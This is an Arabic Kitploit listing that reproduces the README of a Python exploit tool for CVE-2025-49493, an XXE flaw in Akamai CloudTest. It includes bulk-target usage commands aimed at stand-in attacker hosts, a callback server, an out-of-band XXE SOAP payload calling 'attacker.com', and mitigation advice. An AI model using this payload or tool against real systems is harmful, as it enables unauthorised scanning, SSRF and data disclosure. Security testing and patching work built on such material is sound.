Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49493 — هذا استغلال مبني على لغة بايثون لثغرة CVE-2025-49493، والتي تؤثر على إصدارات Akamai CloudTest الأقدم من 60 2025.06.02 (12988). تتيح هذه الثغرة حقن الكيانات الخارجية في XML (XXE) عبر نقطة نهاية خدمة SOAP. | Kitploit
أدوات/GitHubGitHub/sh4den/cve-2025-49493
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubsh4den/cve-2025-49493

CVE-2025-49493

هذا استغلال مبني على لغة بايثون لثغرة CVE-2025-49493، والتي تؤثر على إصدارات Akamai CloudTest الأقدم من 60 2025.06.02 (12988). تتيح هذه الثغرة حقن الكيانات الخارجية في XML (XXE) عبر نقطة نهاية خدمة SOAP.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة XXE في Akamai CloudTest (CVE-2025-49493)

نظرة عامة

هذا استغلال مبني على Python لثغرة CVE-2025-49493، والتي تؤثر على إصدارات Akamai CloudTest قبل 60 2025.06.02 (12988). تسمح الثغرة بحقن الكيانات الخارجية XML (XXE) عبر نقطة نهاية خدمة SOAP.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-49493
  • نوع الثغرة: حقن الكيانات الخارجية XML (XXE)
  • الخطورة: حرجة (CVSS 9.1)
  • البرنامج المتأثر: Akamai CloudTest
  • الإصدارات المتأثرة: قبل 60 2025.06.02 (12988)
  • متجه الهجوم: الشبكة
  • مصادقة مطلوبة: لا

التفاصيل التقنية

توجد الثغرة في نقطة نهاية SOAP /concerto/services/RepositoryService حيث تتم معالجة إدخال XML دون تعقيم مناسب للكيانات الخارجية. يمكن للمهاجم صياغة حمولات XML خبيثة لشن هجمات XXE، مما قد يؤدي إلى:

  • الكشف عن المعلومات
  • SSRF (تزوير الطلبات من جانب الخادم)
  • حجب الخدمة
  • احتمالية تنفيذ تعليمات برمجية عن بُعد (RCE) في بعض الإعدادات

الميزات

  • اكتشاف الأهداف: يحدد تلقائيًا حالات Akamai CloudTest
  • اكتشاف الثغرات: يفحص نقاط النهاية والمؤشرات القابلة للاستغلال
  • استغلال XXE: يرسل طلبات SOAP مصنوعة بحمولات XXE
  • أهداف متعددة: يدعم المعالجة المجمعة من ملفات الأهداف
  • تسجيل مفصّل: تسجيل ملون شامل مع طوابع زمنية
  • معالجة الأخطاء: معالجة قوية للأخطاء لمشاكل الشبكة

التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • مدير الحزم pip

التبعيات

قم بتثبيت الحزم المطلوبة:

root@kitploit:~
pip install -r requirements.txt

أو قم بالتثبيت يدويًا:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

الاستخدام

الاستخدام الأساسي

root@kitploit:~
python main.py targets.txt xxe.attacker.com

الاستخدام المتقدم

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

خيارات سطر الأوامر

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

تنسيق ملف الأهداف

أنشئ ملف targets.txt بهدف واحد في كل سطر:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

إعداد خادم XXE

الخيار 1: استخدام Burp Collaborator

  1. افتح Burp Suite Professional
  2. انتقل إلى Burp > عميل Burp Collaborator
  3. انقر على "Copy to clipboard" للحصول على رابط Collaborator الخاص بك
  4. استخدم هذا الرابط كمعامل xxe_server

الخيار 2: استخدام Interactsh

  1. ثبّت interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. شغّل: interactsh-client
  3. استخدم الرابط المقدم كمعامل xxe_server

الخيار 3: خادم HTTP مخصص

قم بإعداد خادم HTTP بسيط لالتقاط الطلبات:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

تدفق الاستغلال

  1. التحقق من الهدف: يتحقق من تنسيق URL وإمكانية الوصول
  2. اكتشاف الثغرة:
    • يفحص مؤشرات CloudTest في الاستجابة
    • يتحقق من وجود نقطة نهاية خدمة SOAP
  3. توليد حمولة XXE: ينشئ مغلف SOAP خبيث مع XXE
  4. الاستغلال: يرسل طلبًا مصنوعًا إلى نقطة النهاية القابلة للاستغلال
  5. تحليل النتائج: يحلل الاستجابة بحثًا عن مؤشرات النجاح

بنية حمولة XXE

يستخدم الاستغلال بنية حمولة XXE التالية:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

التخفيف

للمسؤولين

  1. إجراءات فورية:

    • قم بتحديث Akamai CloudTest إلى الإصدار 60 2025.06.02 أو أحدث
    • راقب السجلات بحثًا عن أنشطة معالجة XML مشبوهة
    • طبّق تجزئة الشبكة للحد من التعرض
  2. حلول طويلة الأجل:

    • عطّل معالجة الكيانات الخارجية XML في محللات XML
    • طبّق التحقق من صحة الإدخال وتعقيمه
    • استخدم القوائم المسموح بها لمعالجة XML
    • تقييمات أمنية منتظمة

للمطورين

  1. معالجة XML آمنة:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. التحقق من الإدخال:

    • تحقق من جميع إدخالات XML مقابل مخططات صارمة
    • عقم البيانات التي يتحكم بها المستخدم قبل معالجة XML
    • طبّق معالجة أخطاء مناسبة

المراجع

  • البحث الأصلي بواسطة xbow
  • سجل تغييرات Akamai CloudTest
  • تفاصيل CVE-2025-49493
  • الوقاية من XXE وفق OWASP

إخلاء مسؤولية قانوني

يُقدَّم هذه الأداة لأغراض تعليمية واختبار مصرح به فقط. يتحمل المستخدمون مسؤولية ضمان حصولهم على التفويض المناسب قبل اختبار أي أنظمة. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

المساهمة

  1. انسخ المستودع (Fork)
  2. أنشئ فرع ميزة
  3. نفّذ تغييراتك
  4. أضف اختبارات إذا كان ذلك ممكنًا
  5. قدّم طلب سحب (Pull Request)

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

المؤلفون

  • البحث الأصلي: xbow, 3th1c_yuk1
  • تطوير الاستغلال: فريق أبحاث الأمن
  • إسناد CVE: CVE-2025-49493

سجل التغييرات

v1.0.0

  • الإصدار الأولي
  • وظيفة استغلال XXE الأساسية
  • دعم ملف الأهداف
  • تسجيل شامل
  • تحسينات معالجة الأخطاء
تنزيل الأداة